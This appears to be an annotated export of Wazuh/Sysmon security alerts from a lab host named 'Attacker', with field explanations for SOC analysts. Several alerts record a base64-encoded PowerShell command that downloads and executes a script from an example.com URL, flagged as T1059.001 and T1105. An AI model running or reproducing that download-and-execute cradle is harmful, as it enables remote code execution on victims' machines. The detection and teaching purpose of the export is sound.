data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd0d-680a-1d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9884
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:11.795+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:11.795+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  49
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534231.1327005
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:06.2915982Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283458
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:06.270 ProcessGuid: {94294ddc-bd10-680a-300b-000000000e00} ProcessId: 8832 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5pbr2kjg.zae.ps1 CreationUtcTime: 2025-04-24 22:37:06.270 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:06.270
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd10-680a-300b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5pbr2kjg.zae.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:06.270
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:12.154+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:12.154+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  46
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534232.1329770
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:09.0167902Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283484
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:07.666 ProcessGuid: {94294ddc-bd13-680a-340b-000000000e00} ProcessId: 11044 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd10-680a-300b-000000000e00} ParentProcessId: 8832 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:07.666
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd13-680a-340b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd10-680a-300b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:12.219+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:12.219+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  50
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534232.1337837
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:09.2215671Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283487
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:09.193 ProcessGuid: {94294ddc-bd13-680a-340b-000000000e00} ProcessId: 11044 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vpgzfelx.hvu.ps1 CreationUtcTime: 2025-04-24 22:37:09.193 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:09.193
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd13-680a-340b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vpgzfelx.hvu.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:09.193
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:14.605+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:14.605+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  47
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534234.1340606
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:12.5940581Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283514
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:10.461 ProcessGuid: {94294ddc-bd16-680a-360b-000000000e00} ProcessId: 13184 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd13-680a-340b-000000000e00} ParentProcessId: 11044 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:10.461
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd16-680a-360b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13184
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

